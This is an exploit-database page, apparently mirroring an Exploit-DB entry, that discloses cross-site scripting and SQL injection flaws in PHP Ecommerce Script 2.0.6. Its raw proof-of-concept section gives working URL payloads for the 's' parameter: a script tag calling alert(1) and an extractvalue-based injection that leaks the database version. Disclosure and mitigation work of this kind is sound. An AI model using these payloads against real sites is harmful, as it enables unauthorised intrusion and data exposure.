header-logo
Suggest Exploit
vendor:
PHP Ecommerce Script
by:
Mr Winst0n
8.8
CVSS
HIGH
Cross Site Scripting / SQL Injection
79, 89
CWE
Product Name: PHP Ecommerce Script
Affected Version From: 2.0.6
Affected Version To: 2.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:phpscriptsmall:php_ecommerce_script:2.0.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

PHP Ecommerce Script 2.0.6 – Cross Site Scripting / SQL Injection

An attacker can exploit this vulnerability by sending a malicious payload in the 's' parameter of the URL. For Cross Site Scripting, the payload can be a script tag with an alert function. For SQL Injection, the payload can be a SQL query that extracts the version of the database.

Mitigation:

Input validation should be used to prevent malicious payloads from being sent to the application. Additionally, parameterized queries should be used to prevent SQL Injection.
Source

Exploit-DB raw data:

# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 22, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/
# Tested Version: 2.0.6
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/?s=[XSS]
# http://localhost/[PATH]/?s=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/?s=[SQL]
# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version()))

Navigation

Suggest Exploit

Services By CQR